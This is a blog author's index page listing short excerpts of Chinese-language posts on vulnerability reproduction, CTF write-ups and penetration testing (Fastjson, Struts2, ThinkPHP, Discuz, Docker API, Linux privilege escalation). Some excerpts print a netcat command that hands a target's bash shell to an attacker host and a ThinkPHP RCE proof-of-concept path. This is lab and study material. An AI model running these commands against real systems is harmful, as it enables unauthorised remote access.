自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 邮件伪造-swaks

邮件伪造-swaks

2022-09-05 10:38:40 4696 1

原创 web安全-springboot

一、前言文章主要聊一下关于springboot环境下的渗透。Springboot现如今可以说是java开发的一个入门框架,深受各个公司亲赖,现有java站点springboot还是有一定比例的,所以说还是有必要对springboot渗透有一定了解二、攻击思路1、总体分析。...

2022-08-03 09:29:51 1217

原创 cnvd_2019_22238

Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用url:Vulfocus 漏洞威胁分析平台 本地需要安装java环境,启动JNDI-Injection-Exploit-1.0-SNAPSHOT-all

2022-07-12 17:52:37 475

原创 漏洞复现-Fastjson 反序列化

目录漏洞描述漏洞复现 漏洞利用fastjson 1.2.24fastjson 1.2.47附录Fastjson漏洞探测安装java8fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。这里漏洞环境主要是用vulhub上的两个fastjson漏洞搭建,搭建完成以后访问8090端口会出现如下所示我们需要在vps上开启一个RMI服务调

2022-07-05 13:59:27 1362

转载 CTF-WEB shrine模板注入nmap的基本使用

[WesternCTF2018]shrineimport flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(',

2022-07-04 10:58:03 240

翻译 漏洞复现-easy_tornado

windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有三个文件:flag.txt发现flag在/fllllllllllllag文件里;welcome.txtrender是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txtfilehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的

2022-07-04 10:07:03 277

转载 Docker容器进入的4种方式(推荐最后一种)

在使用Docker创建了容器之后,大家比较关心的就是如何进入该容器了,其实进入Docker容器有好几多种方式,这里我们就讲一下常用的几种进入Docker容器的方法。进入Docker容器比较常见的几种做法如下:  Docker提供了attach命令来进入Docker容器。  接下来我们创建一个守护态的Docker容器,然后使用docker attach命令进入该容器。  然后我们使用docker ps查看到该容器信息,接下来就使用docker attach进入该容器  可以看到我们已经进入到该容器中了。  但

2022-06-27 16:26:38 35545 2

原创 漏洞复现-docker-unauthorized-rce

一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org二、漏洞检测直接输入地址 ;若能访

2022-06-27 16:17:34 6362 1

原创 漏洞复现-Struts2-s2-057&&POC

目录环境搭建复现工具复现过程(1)验证漏洞是否存在(2)利用已有的POC(exp)复现POC编写PoC 编写流程Poc编写涉及到的一些库Web漏洞Poc编写基本方法环境搭建漏洞部署使用docker,源码下载链接https://github.com/vulhub/vulhub/tree/master/struts2/s2-057启动环境:docker-compose up -d访问:http://your-ip:8080/struts2-sho..

2022-05-17 17:50:08 1411

翻译 NC反弹shell的几种方法

假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。需要目标机安装nc。反向反弹shell方法1:bash

2022-05-12 15:52:29 9658

原创 权限提升-Linux脏牛内核漏洞&SUID&信息搜集

目录一、信息搜集二、Linux 提权 SUID【漏洞成因】:【查看suid和guid文件】:【其他命令】:【常用提权方式】:namp:findvi/vimlessmoremv /cpnanoawkmanwgetpythonperltcpdump三、内核漏洞提权演示【靶标】【工具】【提权测试】一、信息搜集提权自动化脚本利用两个信息收集:LinEnum,linuxpricchecker两个漏洞..

2022-05-12 15:46:54 644

原创 漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞

目录环境搭建(1)源码下载:漏洞检测报错注入写文件漏洞分析环境搭建(1)源码下载:https://search.gitee.com/?skin=rec&type=repository&q=discuzgit clonehttp://htts://gite.com/ComsenzDiscuzX.git放置于web根目录,访问即可进入安装页面(2)也可搭建vulhub靶场,启动discuz环境漏洞检测http://.....

2022-05-10 15:59:10 1536

原创 WEB安全-中间件漏洞

IIS解析漏洞(iis6.x)基于文件名,该版本默认会将*.asp;jpg此种格式的文件名,当成Asp解析,原理是服务器默认不解析;及后面的内容,相当于截断。基于文件夹名,该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。另外,IIS6.x除了会将扩展名为.asp的文件解析为asp之外,还默认会将扩展名为.asa,.cdx,.cer解析为asp,从网站属性->主目录->配置 可以看出,他们都是调用了asp.dll进行的解析。修复建议1. 限制上传目录执行权限,

2022-05-10 14:02:34 580

原创 漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞

一、环境搭建本次用的是vulhub靶场执行下列命令部署 Discuz!X 安装环境docker-compose up -d安装时,只用修改数据库地址为`db`,其他保持默认即可:二、漏洞复现(1)访问`http://your-ip/robots.txt`可见robots.txt是存在的:(2)注册用户hahaha(3)在个人设置页面找到自己的formhash(4)带上自己的Cookie、formhash发送如下数据包(5)查看个人设置页面的出生地

2022-05-10 14:01:35 875

原创 WEB安全-PHP反序列化漏洞原理

一、漏洞原理在提及漏洞前,首先要先理解PHP中的serialize()和unserialize()两个函数(由于没有PHP开发基础,请各位大哥指出小弟本文中的错误),serizlize()就是将变量、对象、数组等数据类型转换成字符串方便进行网络传输和存储,再通过unserialize()将字符串进行转换成原来的数据。当存在反序列化函数及可利用魔术方法时,且unserialize()接受到的字符串对于用户是可控时,用户可针对使用的magic function(魔术方法)来构造特定的语句,从而达到控制整个反

2022-04-11 11:09:44 1739

原创 漏洞复现-thinkphp2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞

目录一、2-RCE漏洞详情1.构造poc?s=/a/b/c/${phpinfo()}2. 使用蚁剑连接地址为:二、5-RCE漏洞原因:1,访问三、5.0.23-RCE漏洞原因1.利用system函数远程命令执行,利用bp抓包,修改请求方式,使用poc进行攻击:一、2-RCE漏洞详情导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)如果目标字符存在符合正则规.

2022-03-24 17:50:56 625

原创 WEB安全-文件包含

一、文件包含的定义如果说使用文件包含的路径是攻击者可控的话,此时,我们可以通过控制参数变量从而能包含本不在开发者意愿之内的文件。 本地文件包含:包含服务器端的文件 远程文件包含:包含远程url的文件 (allow_url_fopen allow_url_include)可以用什么去截断:? #(%23)二、文件包含的利用1.配合文件上传漏洞执行getshell2.包含日志getshell...

2022-03-01 22:04:46 3121

原创 web安全-命令执行

一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。二、漏洞成因应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令中执行,在没有过滤的情况下就会造成命令执行漏洞。三、相关函数system(args)有回显...

2022-02-23 21:45:50 3283

原创 漏洞复现-CEV-2015-5254

CEV-2015-5254一、漏洞原理二、攻击思路三、漏洞复现四、反弹shell五、修补建议一、漏洞原理漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。细节参考:https://xz.aliyun.com/t/2015二、攻击思路所需设备:PC1构建攻击:有java环境PC2反弹hell:kali服务器:vulhub(有Apache ActiveMQ < 5.x)注:PC1和PC

2021-12-15 14:28:28 255

原创 漏洞复现-Log4j2远程代码执行漏洞(CEV-2015-5254)

目录Windows环境搭建ubuntu环境搭建攻击复现Windows环境搭建1.安装java1.8版本2.打开受影响版本的jar包,文件放在了百度网盘中,请自取链接:https://pan.baidu.com/s/1Jn-hXXv2uXc_W06bJ9-46Q提取码:c4qyubuntu环境搭建1.安装默认JRE / JDK接下来,检查是否已安装Java:java -version如果当前未安装Java,您将看到以下输出.........

2021-12-15 14:26:41 3744

原创 web安全-SQL注入漏洞测试(报错盲注)

1.寻找注入点 当我们闭合了第一个参数后有明显的报错信息,我们就可以考虑基于报错的注入了http://219.153.49.228:41801/new_list.php?id=1’2.报错注入-报错回显 参考:https://www.jianshu.com/p/bc35f8dd4f7c; https://blog.csdn.net/Kevinhanser/article/detai...

2021-07-22 22:52:19 230

原创 web安全-基础入门SQL注入

前提条件1.能拼接sql(如果sql语句中无变量无法操作)2.可控变量可以带入查询(1.$di=$_REQUEST['id'] 2.$result=mysql_query($sql))信息收集 1.操作系统:@@version_compile_os 2.数据库名:database() 3.数据库版本:version() 4.其他数据注入高权限注入判断是否存在注入and 1=1 正常 ......

2021-07-10 16:06:18 97

原创 网络安全-基础入门数据包拓展

一。#request 请求数据包 #proxy 代理服务器 #response 返回数据包 关系图二。http/https http https HTTP HTTP TCP/IP TCP/IP ...

2021-07-06 19:53:11 228 1

原创 Linux磁盘分区

1.磁盘接口有2种:SATA(主流)与SAS2.里面仅有一块virtio接口的磁盘虚拟机使用virtio接口时候磁盘里文件名称应该是/dev/vda3.由于SATA、USB、SAS等磁盘等接口都是使用scsl模块来驱动的,因此这些接口的磁盘设备文件都是/dev/sd[a-p]的格式根据Linux内核检测到的磁盘顺序来命名的。4.磁盘主要由碟片、机械手臂、磁头与主轴马达组成整块磁盘的第一个盘区特备重要,因为他记录了整块磁盘的重要信息 主导记录:安装启动引导程序 ...

2021-06-27 22:09:17 223

原创 认识Linux

1.Linux自己的文件数据:/usr/share/doc2.Linux系统中每个设备都被当成一个文件来对待3.SATA接口的文件接口的文件硬盘的文件名即为/dev/sa[a-d],其中括号内的字母为a-d当中的任意一个,既有/dev/sda /dev/sdb /dev/sdc4.在Linux系统中,几乎所有的硬件设备都在/dev这个目录内...

2021-06-27 21:45:29 214

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除